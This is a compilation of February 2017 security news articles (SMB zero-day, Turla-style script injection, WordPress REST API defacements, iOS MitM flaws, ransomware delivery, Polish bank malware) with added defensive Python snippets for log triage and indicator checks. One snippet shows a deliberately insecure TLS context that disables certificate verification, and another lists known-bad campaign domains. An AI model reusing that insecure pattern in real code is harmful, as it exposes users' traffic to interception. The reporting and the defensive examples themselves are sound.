The Temporally Recurrent Optimal Learning™ approach (abbreviated as "TROL(L)"), hitherto unknown to science, was actively promoted on Twitter by conference participants. Within a few hours this resulted in five large companies contacting the project's authors with investment offers. The value of the "project" was estimated at tens of millions of dollars.

Now, it’s time to lay the cards on the table: the Rocket AI project was created by experts in machine learning as a prank whose goal was to draw attention to the issue that was put perfectly into words by an author at Medium.com: “Artificial Intelligence has become the most hyped sector of technology. With national press reporting on its dramatic potential, large corporations and investors are desperately trying to break into this field. Many start-ups go to great lengths to emphasize their use of “machine learning” in their pitches, however trivial it may seem. The tech press celebrates companies with no products, that contribute no new technology, and at overly-inflated cost.”

In reality, much of what is marketed as new in machine learning is not: the popular approaches to artificial intelligence are decades-old ideas.

“Clever teams are exploiting the obscurity and cachet of this field to raise more money, knowing that investors and the press have little understanding of how machine learning works in practice,” the author added.

An Anti-Virus of the Very Next Generation

It may seem that the outcome of the prank revealed nothing new: investors have a weakness for whatever they hear about. Investment bubbles have existed and will continue to exist. Our generation alone has seen the advent of dotcoms, biometrics and bitcoins. Now we have AI, and I am sure that 2017 will bring us something new as well.

Yet after I took a peek at the data-security start-ups that are springing up like mushrooms after rain and claiming to employ "very real" AI (of the very next generation), an amusing idea crossed my mind.

What would happen if we did the same thing the respected AI experts did? We could come to an agreement with other representatives of the cybersecurity industry (I would like to point out the principle of "coopetition", which combines market competition with cooperation in the areas of research and user protection) and create a joint project. Meet Rocket AV.


If respected IT experts were to advertise it all over their Twitter accounts, then — who knows? — maybe we could attract tens of millions of dollars’ worth of investments.

But no, it’d probably be better for us to continue doing what we are best at: protecting users from cyberthreats. This is the essence of True CyberSecurity.


Smart TV Maker Vizio Fined $2.2 Million For Spying on Its 11 Million Users
7.2.2017 thehackernews Virus
Your government is spying on you! Businesses are spying on you! Your phone and browser are constantly spying on you! Even your TV is spying on you!
Yes, you should also worry about your "smart" TV: Vizio, one of the world's biggest smart TV makers, has been caught secretly collecting viewing data from more than 11 million smart TVs and selling it to third parties without users' explicit consent.
The good news is that the home entertainment hardware maker has been fined heavily for this practice.
The US Federal Trade Commission (FTC) announced on Monday that Vizio had tracked almost every customer of its smart TVs through its Smart Interactivity feature, and rather than contesting the accusation any longer, the company has agreed to pay $2.2 million to settle the case.
"To settle the case, Vizio has agreed to stop unauthorized tracking, to prominently disclose its TV viewing collection practices, and to get consumers’ express consent before collecting and sharing viewing information," the FTC says.
"In addition, the company must delete most of the data it collected and put a privacy program in place that evaluates Vizio’s practices and its partners."
According to the FTC, the smart TV maker installed tracking software that collected the viewing habits of 11 million of its smart TVs without informing its customers or seeking their consent.
Besides this, the company also collected each household's IP address, nearby access points and zip code, and shared that information with third-party companies, which used it to target advertising at Vizio TV owners.
The tracking software reportedly worked by sampling a selection of on-screen pixels every second the TV was on and comparing that data against a database of known movies, television shows, commercials and other video content. This practice is known as automatic content recognition (ACR).
According to the FTC, Vizio also recorded the date, time and channel of TV shows and whether you watched the program live or recorded, and tied all of that information to your IP address.
With this data in hand, anyone can learn your television viewing habits, and according to the complaint filed by the FTC, "Vizio then turned that mountain of data into cash by selling consumers' viewing histories to advertisers and others."
As part of the settlement, Vizio has agreed to stop unauthorized tracking, prominently disclose its TV viewing collection practices, and get consumers' express consent before collecting or sharing their information with other companies.
How to Stop Your Smart TV From Spying on You
To check whether your Vizio TV is tracking you, open the TV's settings menu (or the HDTV Settings app directly) and look at the "Smart Interactivity" setting, which is Vizio's name for its ACR feature. If it is on, turn it off:
Open Setting Menu and Select System
Select Reset & Admin
Select Smart Interactivity.
Press arrow to change setting to off
Besides this, Vizio must also delete most of the data the company gathered and put a privacy program in place that evaluates its practices and partners.


Windows SMB 0-Day Risk Downplayed

7.2.2017 securityweek Vulnerability

A zero-day vulnerability (CVE-2017-0016) in the SMBv3 (Server Message Block) client code of Windows that was revealed last week is no longer rated Critical, but High.

The issue lies in how Windows handles SMB traffic and allows an unauthenticated, remote attacker to cause a denial of service. It is triggered when a vulnerable Windows client connects to a malicious SMB server, so the attacker only has to get the victim to connect to a server under their control.

SMB is an application-layer network protocol that allows computers to access files, printers, serial ports, and miscellaneous communications between nodes on a local network. It also offers an authenticated inter-process communication mechanism.

The flaw became public after the researcher who discovered it published a proof-of-concept exploit on GitHub. The CERT Coordination Center (CERT/CC) at Carnegie Mellon University initially assessed the issue as critical and even suggested a severity score of 10, because of possible exploitation for arbitrary code execution.

CERT/CC has since revised the advisory, removing all mention of arbitrary code execution and lowering the severity score. With a CVSS (Common Vulnerability Scoring System) score of 7.8, the bug is rated High in the updated advisory.

“To be vulnerable, a client needs to support SMBv3, which was introduced in Windows 8 for clients and Windows 2012 on servers,” Johannes B. Ullrich, Ph.D., Dean of Research for the SANS Technology Institute, notes.

The advisory initially listed only Windows 10 and Windows 8.1 as confirmed vulnerable platforms, but it has been updated to include their server counterparts: "We have confirmed the crash with fully-patched Windows 10 and Windows 8.1 client systems, as well as the server equivalents of these platforms, Windows Server 2016 and Windows Server 2012 R2," CERT notes.

As before, the advisory points out that no practical solution is known yet, but that a workaround is to block outbound SMB connections (TCP ports 139 and 445, along with UDP ports 137 and 138) from the local network to the WAN. Note that such a perimeter rule only covers malicious servers on the internet; a rogue SMB server inside the local network would still reach vulnerable clients.
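One way to verify that the egress workaround above is in place, and to see which internal hosts tried to talk SMB to the outside anyway, added here as an example and not part of the CERT/CC advisory or of SecurityWeek's text: parse Windows Firewall log records (the default pfirewall.log field order is assumed) and report every record in which a source in the RFC 1918 or link-local ranges talks to a non-internal destination on one of the four SMB/NetBIOS ports. An ALLOW hit means the rule is missing; a DROP hit means it works and names a client worth a closer look. The log lines are constructed for the example and use documentation addresses.

```python
import ipaddress
from typing import Dict, Iterable, List, Optional, Tuple

# Ports named in the CERT/CC workaround.
SMB_TCP_PORTS = {139, 445}
SMB_UDP_PORTS = {137, 138}

# Ranges treated as "the local network"; adjust to your own addressing plan.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "169.254.0.0/16", "127.0.0.0/8")]


def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_pfirewall_line(line: str) -> Optional[Dict[str, object]]:
    """Parse one Windows Firewall log record.

    Assumed W3C field order (pfirewall.log default):
    date time action protocol src-ip dst-ip src-port dst-port size ...
    Header and comment lines start with '#'.
    """
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    f = line.split()
    if len(f) < 8:
        return None
    try:
        dport = int(f[7]) if f[7] != "-" else None
    except ValueError:
        return None
    return {"action": f[2], "proto": f[3].upper(), "src": f[4], "dst": f[5], "dport": dport}


def is_outbound_smb(rec: Optional[Dict[str, object]]) -> bool:
    """True when an internal source talks to a non-internal destination on an SMB/NetBIOS port."""
    if rec is None or rec["dport"] is None:
        return False
    ports = {"TCP": SMB_TCP_PORTS, "UDP": SMB_UDP_PORTS}.get(rec["proto"], set())
    try:
        return rec["dport"] in ports and is_internal(rec["src"]) and not is_internal(rec["dst"])
    except ValueError:  # unparsable address in the record
        return False


def find_outbound_smb(lines: Iterable[str]) -> List[Tuple[str, str, int, str]]:
    """(src, dst, dport, action) for every egress SMB/NetBIOS record, in log order."""
    hits: List[Tuple[str, str, int, str]] = []
    for line in lines:
        rec = parse_pfirewall_line(line)
        if is_outbound_smb(rec):
            hits.append((rec["src"], rec["dst"], rec["dport"], rec["action"]))
    return hits


# Constructed sample in pfirewall.log format; 203.0.113.x and 198.51.100.x are documentation ranges.
SAMPLE_LOG = """\
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2017-02-07 10:00:01 ALLOW TCP 192.168.1.10 203.0.113.5 49152 445 0 - 0 0 0 - - - SEND
2017-02-07 10:00:02 ALLOW TCP 192.168.1.10 192.168.1.20 49153 445 0 - 0 0 0 - - - SEND
2017-02-07 10:00:03 DROP TCP 192.168.1.11 198.51.100.7 49154 139 0 - 0 0 0 - - - SEND
2017-02-07 10:00:04 ALLOW UDP 192.168.1.12 203.0.113.9 137 137 0 - - - - - - - SEND
2017-02-07 10:00:05 ALLOW TCP 192.168.1.10 93.184.216.34 49155 443 0 - 0 0 0 - - - SEND
""".splitlines()


if __name__ == "__main__":
    for src, dst, dport, action in find_outbound_smb(SAMPLE_LOG):
        print(f"{action:5} {src} -> {dst}:{dport}")
```

Internal-to-internal SMB (the second line) and non-SMB egress (the last line) are deliberately ignored; the same predicate works on any flow source once the parser is swapped for that source's format.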

Given that this is no longer considered a Critical flaw, Microsoft is unlikely to patch it via an out-of-band update, but rather via the monthly set of security patches, which are expected to arrive next week. SecurityWeek contacted Microsoft for specifics on this but hasn’t heard back yet.


Turla-Linked Group Targets Embassies, Ministries

7.2.2017 securityweek Virus
Researchers at Forcepoint Security Labs have been monitoring the activities of a threat group that has targeted the websites of ministries, embassies and other organizations from around the world in a reconnaissance campaign.

While it’s unclear exactly who is behind the operation and what their motives are, evidence points to an advanced persistent threat (APT) actor that leverages techniques similar to the ones used by the Russia-linked group known as Turla.

According to the security firm, the attacks targeted the websites of foreign affairs ministries in Moldova, Kyrgyzstan and Uzbekistan; embassies of Russia, Zambia, Jordan and Iraq; a political party, a sports association and a government-run sustainability organization in Austria; a news company in Somalia, a socialist organization in Spain, a road safety entity in Ukraine; a French international cooperation organization; and a plant society and a union in Africa.

Experts pointed out that all of the targeted embassy websites belong to embassies located in Washington, D.C.

The attackers injected malicious code into each of the compromised sites in an effort to profile their visitors. The malicious code is disguised as a script associated with the web analytics service Clicky.

The hacked sites communicate with several domains; the oldest of them, nbcpost[.]com, was registered in December 2015. In November 2016 the attackers started using psoncorp[.]com and mentalhealthcheck[.]net, both registered in February 2016, and this week they began using travelclothes[.]org, a domain registered in November.

Researchers said a majority of the websites were breached in April 2016 and some of them were under the attackers’ control for up to 10 months.

Forcepoint believes these attacks could be linked to Turla, also known as Waterbug, Venomous Bear and KRYPTON. This theory is based on the overlap in targets and the fact that Turla has been known to use fake web analytics scripts in their reconnaissance campaigns.

Switzerland’s GovCERT reported in May 2016 that the Turla attack aimed at Swiss defense firm RUAG involved malicious code disguised as Google Analytics scripts.

Kaspersky Lab confirmed recently that Turla, which has been around since at least 2007, is still active. Researchers discovered new JavaScript malware used by the group in attacks aimed at organizations located in Greece, Qatar and Romania.
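A check a site owner can run against their own pages for the kind of injection described above, added here as an example and not taken from Forcepoint's report: inventory every external `<script src>` on a page and bucket each host as a known-bad domain from the report, an expected third-party host, a local path, or an unknown host that needs a look. The allow-list (the real Clicky host) is an assumption for this example and the HTML is constructed; the script path on the known-bad host is invented for the sample and is not an indicator from the report.

```python
from html.parser import HTMLParser
from typing import Dict, Iterable, List
from urllib.parse import urlparse

# Domains named in the Forcepoint report (written defanged with [.] in the article).
KNOWN_BAD = {"nbcpost.com", "psoncorp.com", "mentalhealthcheck.net", "travelclothes.org"}
# Third-party script hosts the site is expected to load; an assumption for this example.
ALLOWED = {"static.getclicky.com"}


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag."""

    def __init__(self) -> None:
        super().__init__()
        self.srcs: List[str] = []

    def handle_starttag(self, tag, attrs) -> None:
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value)


def host_of(src: str, site_host: str) -> str:
    """Host a script is loaded from; relative and root-relative paths count as the site itself."""
    parsed = urlparse(src.strip())  # handles scheme-relative '//host/path' as well
    return (parsed.hostname or site_host).lower()


def matches_domain(host: str, domains: Iterable[str]) -> bool:
    return any(host == d or host.endswith("." + d) for d in domains)


def triage_scripts(html: str, site_host: str) -> Dict[str, List[str]]:
    """Bucket every script src into known_bad / allowed / local / unknown, in page order."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    report: Dict[str, List[str]] = {"known_bad": [], "allowed": [], "local": [], "unknown": []}
    for src in collector.srcs:
        host = host_of(src, site_host)
        if matches_domain(host, KNOWN_BAD):
            report["known_bad"].append(src)
        elif host == site_host.lower():
            report["local"].append(src)
        elif matches_domain(host, ALLOWED):
            report["allowed"].append(src)
        else:
            report["unknown"].append(src)
    return report


# Constructed page: one local script, the genuine Clicky loader, an injected script on a
# report-listed domain (path invented), and an unrelated third party.
SAMPLE_HTML = """<html><head>
<script src="/js/site.js"></script>
<script src="//static.getclicky.com/js"></script>
<script src="https://mentalhealthcheck.net/analytics.js"></script>
<script src="https://cdn.example.net/widget.js"></script>
<script>var clicky_site_ids = [];</script>
</head><body></body></html>"""


if __name__ == "__main__":
    for bucket, srcs in triage_scripts(SAMPLE_HTML, "embassy.example").items():
        print(bucket, srcs)
```

Inline scripts are not inventoried here; a fake analytics snippet can also be injected inline, so a fuller check would diff the page's inline script bodies against a known-good copy as well.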


WordPress content injection flaw abused in defacement campaigns
7.2.2017 securityaffairs Vulnerability
According to experts at the security firm Sucuri, a recently disclosed critical content injection flaw in WordPress has already been exploited to deface thousands of websites.
The vulnerability is an unauthenticated content injection flaw in the WordPress REST API. It was patched in WordPress 4.7.2 before being publicly disclosed, so it is not a zero-day in the strict sense; the problem is the large number of sites that have not applied the update.

The vulnerability was discovered by a security researcher at Sucuri, who explained that it could be exploited by an unauthenticated attacker to inject malicious content and to escalate privileges.

An attacker could exploit the flaw to modify posts, pages and any other content.

“This privilege escalation vulnerability affects the WordPress REST API that was recently put into widespread use across WordPress sites with the introduction of official API endpoints in version 4.7.” states a blog post published by Sucuri. “One of these endpoints allows access (via the API) to view, edit, delete and create posts. Within this particular endpoint, a subtle bug allows visitors to edit any post on the site.

The REST API is enabled by default on all sites using WordPress 4.7 or 4.7.1. If your website is on these versions of WordPress then it is currently vulnerable to this bug.”

The impact is severe: at least 18 million websites run the popular WordPress CMS, and roughly 26% of the top 10,000 websites use it.

Sucuri worked with the WordPress development team, which fixed the content injection vulnerability in release 4.7.2, issued on January 26.

The bad news is that many WordPress websites still haven't been updated, leaving their installations open to attack.

Sucuri reported the first attacks leveraging the vulnerability less than 48 hours after its disclosure.

“In less than 48 hours after the vulnerability was disclosed, we saw multiple public exploits being shared and posted online. With that information easily available, the internet-wide probing and exploit attempts began.” states a report published by Sucuri.

The experts observed several massive defacement campaigns targeting WordPress sites across the world; in one of them, the attackers replaced the content of more than 60,000 web pages with "Hacked by" statements.

Sucuri tracked three other campaigns, two of which appear to share a single source IP address; each of them targeted roughly 500 pages.

The real risk with defacements on this scale is that crooks will go on to leverage the WordPress vulnerability for black-hat SEO campaigns.

“What we expect to see is a lot more SEO spam (Search Engine Poisoning) attempts moving forward. There’s already a few exploit attempts that try to add spam images and content to a post. Due to the monetization possibilities, this will likely be the #1 route to abuse this vulnerability.” states Sucuri.

Search engine poisoning is a profitable activity in the cybercrime ecosystem.

Sucuri's WAF network has observed a significant increase in the number of exploit attempts over the last week, as shown in the following graph.

[graph: exploit attempts against the REST API seen by the Sucuri WAF network over the last week]

A recent Sucuri report states that more than half of the WordPress websites hijacked in 2016 were running an outdated version. By default, WordPress installs minor and security releases such as 4.7.2 automatically, so website administrators are strongly advised not to disable this feature, and to check that it is actually working on any site where the update has not yet appeared.


Many WordPress Sites Hacked via Recently Patched Flaw

7.2.2017 securityweek Hacking
The critical vulnerability disclosed last week by WordPress developers has already been exploited to hack thousands of websites, security firm Sucuri warned on Monday.

When WordPress 4.7.2 was released on January 26, the developers of the content management system (CMS) informed users that the latest version patched three vulnerabilities, including SQL injection, cross-site scripting (XSS) and access control issues.

Roughly one week later, developers admitted that version 4.7.2 patched another flaw, described as an unauthenticated privilege escalation and content injection vulnerability affecting the REST API. The security hole allows an attacker to modify the content of any post or page on a targeted site.

The flaw, identified by researchers at Sucuri, was disclosed one week after the release of WordPress 4.7.2 to give users enough time to patch their installations. However, according to Sucuri, many WordPress websites still haven’t been updated.

Sucuri, which has tracked four different defacement campaigns, started seeing the first attacks leveraging this vulnerability less than 48 hours after disclosure.

In one of these campaigns, attackers replaced the content of more than 60,000 web pages with “Hacked by” messages. The other three operations, two of which seem to share a single IP address, have each targeted roughly 500 pages.


SecurityWeek has noticed that some of the compromised websites have also been re-defaced by a fifth actor. Fortunately, some of the affected sites have already been cleaned up and updated to WordPress 4.7.2.

While these attacks appear to be carried out mostly by script kiddies looking to boost their online reputation, researchers believe the vulnerability will be increasingly exploited for search engine poisoning.

“There’s already a few exploit attempts that try to add spam images and content to a post. Due to the monetization possibilities, this will likely be the #1 route to abuse this vulnerability,” explained Daniel Cid, CTO and founder of Sucuri.

The company’s WAF network has seen an increasing number of exploit attempts, reaching nearly 3,000 on Monday.

A recent report from Sucuri showed that more than half of the WordPress websites hijacked last year were outdated at the point of infection. By default, WordPress installations are updated automatically when a new version becomes available, but some administrators have disabled the feature, often due to concerns that the updates may break their websites.
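Two checks a site owner can run for the vulnerability covered in the two articles above, added here as an example and not taken from Sucuri's or WordPress's code: a version test against the affected releases (the generator meta tag is only a hint, since many sites strip it), and a triage of web-server access-log lines for write requests to the REST API posts route, in both its /wp-json/ and ?rest_route= forms, grouped by client address. Read-only GET requests to the same route are normal REST traffic and are ignored. The log lines are constructed and use documentation addresses.

```python
import re
from collections import defaultdict
from typing import Dict, Iterable, List, Optional, Tuple
from urllib.parse import unquote

# WordPress 4.7 and 4.7.1 ship the REST API enabled by default and lack the 4.7.2 fix.
VULNERABLE_VERSIONS = {(4, 7, 0), (4, 7, 1)}

GENERATOR_RE = re.compile(r'<meta\s+name="generator"\s+content="WordPress\s+([\d.]+)"', re.I)
# Combined log format as written by Apache/nginx; the constructed lines below follow it.
ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# The posts route, either as a pretty permalink or via the rest_route query parameter.
POSTS_ROUTE = re.compile(r"(?:^/wp-json/wp/v2/posts|[?&]rest_route=/wp/v2/posts)(?:[/?&]|$)")
WRITE_METHODS = {"POST", "PUT", "PATCH", "DELETE"}


def parse_version(v: str) -> Tuple[int, ...]:
    """'4.7' -> (4, 7, 0); '4.7.2' -> (4, 7, 2)."""
    parts = [int(x) for x in v.strip().split(".")]
    parts += [0] * (3 - len(parts))
    return tuple(parts[:3])


def version_from_generator(html: str) -> Optional[str]:
    m = GENERATOR_RE.search(html)
    return m.group(1) if m else None


def is_vulnerable_version(v: str) -> bool:
    return parse_version(v) in VULNERABLE_VERSIONS


def suspicious_rest_writes(lines: Iterable[str]) -> Dict[str, List[Tuple[str, str, int]]]:
    """Group (method, path, status) of write requests to the posts route by client IP."""
    hits: Dict[str, List[Tuple[str, str, int]]] = defaultdict(list)
    for line in lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue
        ip, method, path, status = m.group(1), m.group(2).upper(), unquote(m.group(3)), int(m.group(4))
        if method in WRITE_METHODS and POSTS_ROUTE.search(path):
            hits[ip].append((method, path, status))
    return dict(hits)


# Constructed access-log excerpt (documentation addresses; user agents are placeholders).
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [06/Feb/2017:10:01:02 +0000] "POST /wp-json/wp/v2/posts/1 HTTP/1.1" 200 1523 "-" "python-requests/2.12"
203.0.113.7 - - [06/Feb/2017:10:01:03 +0000] "POST /wp-json/wp/v2/posts/2 HTTP/1.1" 200 1490 "-" "python-requests/2.12"
198.51.100.4 - - [06/Feb/2017:10:05:00 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 8800 "-" "Mozilla/5.0"
198.51.100.4 - - [06/Feb/2017:10:05:10 +0000] "POST /?rest_route=/wp/v2/posts/3 HTTP/1.1" 403 120 "-" "curl/7.51"
192.0.2.9 - - [06/Feb/2017:10:06:00 +0000] "GET /index.php HTTP/1.1" 200 5000 "-" "Mozilla/5.0"
""".splitlines()


if __name__ == "__main__":
    v = version_from_generator('<meta name="generator" content="WordPress 4.7.1" />')
    print("site version:", v, "vulnerable:", is_vulnerable_version(v))
    for ip, reqs in suspicious_rest_writes(SAMPLE_ACCESS_LOG).items():
        print(ip, reqs)
```

A 200 on a write from an address that never authenticated is the signal to go and diff the affected posts; a 403 means the WAF or the patched API refused it. Legitimate editors also write through this route from the admin UI, so correlate hits with logged-in sessions before concluding anything.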


Hackers Can Intercept Data From Popular iOS Apps

7.2.2017 securityweek Apple
Dozens of popular iOS applications are affected by vulnerabilities that allow man-in-the-middle (MitM) attackers to silently intercept data from connections that should be protected by TLS, a study has found.

The developers of verify.ly, a service designed to find security issues in iOS apps, analyzed applications in the Apple App Store and identified hundreds that are likely vulnerable to data interception. They tested each of these on an iPhone running iOS 10 and confirmed that 76 were vulnerable.

According to Will Strafach, iOS security expert and developer of verify.ly, the affected applications have been downloaded more than 18 million times. The vulnerability is considered high risk in the case of 19 of the 76 applications, as they expose financial or medical service credentials or session authentication tokens.

The medium risk category includes 24 iOS apps, which also expose login credentials and session authentication tokens. The names of the high and medium risk apps have not been disclosed in order to give vendors time to patch the flaws.

Researchers identified 33 low risk applications, which allow attackers to intercept only partially sensitive information, including analytics data, email addresses, and login credentials that would only be entered on a trusted network. The list includes banking, VPN, entertainment, news, stock trading, chat, and Snapchat-related apps.

“This sort of [MitM] attack can be conducted by any party within Wi-Fi range of your device while it is in use. This can be anywhere in public, or even within your home if an attacker can get within close range,” Strafach explained. “Such an attack can be conducted using either custom hardware, or a slightly modified mobile phone, depending on the required range and capabilities. The best similar and well-understood form of attack to this would be the ability to read data from credit cards at a close range.”

Applications are vulnerable because of the way their developers implemented network-related code, in effect accepting TLS certificates that the platform's default validation would reject, which means only the developers can properly fix the issue. End users can reduce their exposure by using the affected applications only over a cellular data connection, which is much harder to intercept than Wi-Fi.

An automated analysis of Android apps conducted back in 2014 by CERT/CC showed that thousands of applications were vulnerable to MitM attacks, and many of them are still vulnerable today.


76 Popular iOS apps are vulnerable to man-in-the-middle (MITM) attacks
7.2.2017 securityweek Apple

A study of iOS mobile apps found that dozens of them are affected by security vulnerabilities that allow an attacker to run man-in-the-middle (MitM) attacks and intercept data from connections that should be protected by TLS.

The study was conducted by the developers of verify.ly, a service that analyzes iOS apps for security issues. They analyzed applications in the Apple App Store and found hundreds of issues that potentially expose mobile users to MitM attacks. The candidate applications were tested on an iPhone running iOS 10, and 76 were confirmed vulnerable.

The impact is serious if we consider that the affected applications account for more than 18 million downloads. The vulnerability is considered high risk in the case of 19 of the 76 applications. The applications expose sensitive data, including financial or medical service credentials or session authentication tokens.

“During the testing process, I was able to confirm 76 popular iOS applications allow a silent man-in-the-middle attack to be performed on connections which should be protected by TLS (HTTPS), allowing interception and/or manipulation of data in motion.” reads the blog post published by the researchers.

“According to Apptopia estimates, there has been a combined total of more than 18,000,000 (Eighteen Million) downloads of app versions which are confirmed to be affected by this vulnerability.”

Examining the key findings of the report we can see that:

the medium-risk category includes 24 iOS apps that expose login credentials and session authentication tokens.
the low-risk category includes 33 iOS apps that are affected by flaws that could be exploited by attackers to intercept only partially sensitive information such as email addresses and login credentials.
“This sort of attack can be conducted by any party within Wi-Fi range of your device while it is in use. This can be anywhere in public, or even within your home if an attacker can get within close range,” continues the post. “Such an attack can be conducted using either custom hardware, or a slightly modified mobile phone, depending on the required range and capabilities. The best similar and well-understood form of attack to this would be the ability to read data from credit cards at a close range.”

The issues discovered by the experts stem from lax adoption of secure coding practices. Until fixes arrive, users of the affected iOS apps should avoid using them on Wi-Fi networks.
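The coding mistake behind the findings in the two articles above, shown beside the correct form, as an added example in Python's ssl module rather than the apps' own Objective-C or Swift code (the pattern is the same: verification switched off, so any certificate presented on the Wi-Fi path is accepted). The hardened form keeps the platform's default chain and hostname validation and adds an optional certificate pin on top of it; the pin values in the test are computed over constructed bytes, not a real certificate.

```python
import hashlib
import socket
import ssl
from typing import Dict


def insecure_context() -> ssl.SSLContext:
    """The anti-pattern behind the findings: a client that accepts any certificate.

    With hostname checking and chain verification both off, anyone on the Wi-Fi path
    can present their own certificate and read or alter the 'TLS' traffic. Do not ship this.
    """
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
    ctx.check_hostname = False          # must be cleared before verify_mode may be CERT_NONE
    ctx.verify_mode = ssl.CERT_NONE
    return ctx


def hardened_context() -> ssl.SSLContext:
    """The platform default: chain validated against the system roots, hostname checked."""
    ctx = ssl.create_default_context()
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    return ctx


def describe_context(ctx: ssl.SSLContext) -> Dict[str, bool]:
    """The two properties a code review of networking code should look for."""
    return {"verifies_chain": ctx.verify_mode != ssl.CERT_NONE,
            "checks_hostname": bool(ctx.check_hostname)}


def fingerprint(der_cert: bytes) -> str:
    """SHA-256 over the DER encoding of a certificate, lower-case hex."""
    return hashlib.sha256(der_cert).hexdigest()


def pin_matches(der_cert: bytes, expected_sha256_hex: str) -> bool:
    """Compare against a pin written with or without colon separators."""
    return fingerprint(der_cert) == expected_sha256_hex.lower().replace(":", "")


def connect_pinned(host: str, port: int, expected_sha256_hex: str,
                   timeout: float = 5.0) -> ssl.SSLSocket:
    """Open a fully verified TLS connection and additionally require the leaf cert to match a pin.

    The pin is an extra control on top of normal validation, never a replacement for it.
    """
    ctx = hardened_context()
    raw = socket.create_connection((host, port), timeout=timeout)
    sock = ctx.wrap_socket(raw, server_hostname=host)
    leaf = sock.getpeercert(binary_form=True)
    if leaf is None or not pin_matches(leaf, expected_sha256_hex):
        sock.close()
        raise ssl.SSLError("leaf certificate does not match the pinned fingerprint for %s" % host)
    return sock


if __name__ == "__main__":
    print("insecure:", describe_context(insecure_context()))
    print("hardened:", describe_context(hardened_context()))
```

Pinning the leaf certificate means the pin must be rotated with every certificate renewal; pinning a CA or the server's public key is less brittle. Either way, the first question in a review is whether `verifies_chain` and `checks_hostname` are both true on the context the app actually uses.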


Phishme observed operators behind Locky and Sage ransomware share delivery infrastructure
7.2.2017 securityaffairs Virus

PhishMe security researchers discovered that the Locky and Sage ransomware were recently distributed through the same delivery infrastructure.
Sharing delivery infrastructure is a common habit among cybercriminals: it maximizes the use of their resources and minimizes their costs.

Recently the Locky ransomware was observed being distributed through the delivery infrastructure used to spread the Sage ransomware.

A couple of weeks ago, researchers from Cisco's security team noticed traces of traffic from the dormant Necurs botnet and warned of a possible new massive ransomware spam campaign.

Now researchers at PhishMe report that cybercriminals are sharing delivery infrastructure for both Sage and Locky, likely because the operators behind Locky are working on securing new distribution channels after Necurs, the main driver behind Locky and Dridex activity, largely went quiet.

"Sage and Locky Ransomware Now Sharing Delivery Infrastructure in Phishing Attacks" is the title of the blog post published by PhishMe.

The Sage ransomware emerged only recently; malware researchers spotted it in December 2016 being spread through phishing messages with malicious attachments. The threat actors frequently changed tactics to elude spam filters, for example by using random numbers in e-mail subjects in the recent campaigns.

“Following this early distribution, threat actors moved toward the mainstream in a major way. The phishing email subjects used random numbers to help elude some basic filters and leveraged business-related themes rather than explicit or racy narratives. The body of these emails explained that a financial transaction had been rejected and claimed that details about the failure could be found in an attached document.” reads the analysis published by Phishme.

Some of the distribution emails didn’t have a subject line and used the recipient’s name as part of the attachment’s file name. The attachment is a double-zipped archive containing a malicious Office document or .js file that is used to launch the attack.

Other emails claimed to contain information about a financial transaction that had been rejected, or about a refund deposit that had failed due to the cancellation of an order.

“In this more polished campaign, the .zip file (named “document_1.zip”) contained a JavaScript application which, when run, facilitated the download of a Windows executable representing the Sage Ransomware,” continues PhishMe. “In this case, the payload binary was retrieved from the domain affections[.]top, however the payment gateway’s Tor site, as well as the unusual Tor2Web gateway addresses on er29sl[.]com and rzunt3u2[.]com remained the same.”

Starting on January 26, 2017, the experts noticed a phishing campaign delivering the Locky ransomware that had many similarities to the campaign used to spread Sage. The researchers observed the domain affections[.]top being used as part of the Locky delivery infrastructure on Monday, January 30.

“This connection pushes the narrative forward in yet another way as the Locky distribution in question was yet another example of that ransomware being paired with the Kovter Trojan,” PhishMe notes.

Researchers at Microsoft had previously demonstrated the link between Locky and Kovter, detailing a two-step technique adopted by crooks that first attempted to drop the Locky ransomware and switched to the Kovter malware if that failed.

The distribution of both threats, Sage and Locky, from the same delivery infrastructure led the experts to believe that the operators were likely using a service offered in the criminal underground to spread the ransomware.

“First, the shared infrastructure provides a high-fidelity indicator of compromise that can be preemptively blocked to foil the delivery of multiple ransomware varieties. Secondly, since the qualitative tactics, techniques, and procedures used in the distribution of these ransomware varieties are nearly identical and closely resemble classic phishing narratives easily recognizable to users prepared and empowered to identify and report phishing emails,” added PhishMe.


Crooks hacked Polish banks with a malware planted on Government site
7.2.2017 securityaffairs Virus

Several Polish banks confirmed their systems were infected with malware after their staff visited the site of the Polish Financial Supervision Authority.
Polish banks are investigating a massive cyber attack after malware was spotted on several servers of the financial institutions.

The cyber attack was first reported last Friday by Zaufana Trzecia Strona, a Polish news site.

The interesting aspect of the attack is that crooks used the Polish financial regulator, the Polish Financial Supervision Authority (KNF), to spread the malware.

A spokesman for the KNF confirmed that the regulator’s internal systems had been compromised by hackers “from another country”. The attackers planted on the regulator’s servers the malicious files that were used in the attacks against the Polish banks.

To avoid spreading the malware further, the authorities decided to shut down the entire network at the KNF “in order to secure evidence.”


The malware-based attack was confirmed by a number of banks that are currently investigating the security breach.

The IT staff at the banks noticed anomalous traffic associated with the presence of executables on several servers.

“It has been a busy week in SOCs all over the Polish financial sector. At least a few of Poland’s 20-something commercial banks have already confirmed being victims of a malware infection while others keep looking. Network traffic to exotic locations and encrypted executables nobody recognized on some servers were the first signs of trouble,” reported the badcyber.com website. “A little more than a week ago one of the banks detected strange malware present in a few workstations. Having established basic indicators of compromise, they managed to share that information with other banks, who started asking their SIEMs for information. In some cases, the results came back positive.”

According to the first findings of the investigation, the KNF’s website had been compromised and one of the site’s JavaScript files had been modified.

Ironically the KNF is the regulating body that monitors and promotes security measures adopted by Polish banks.

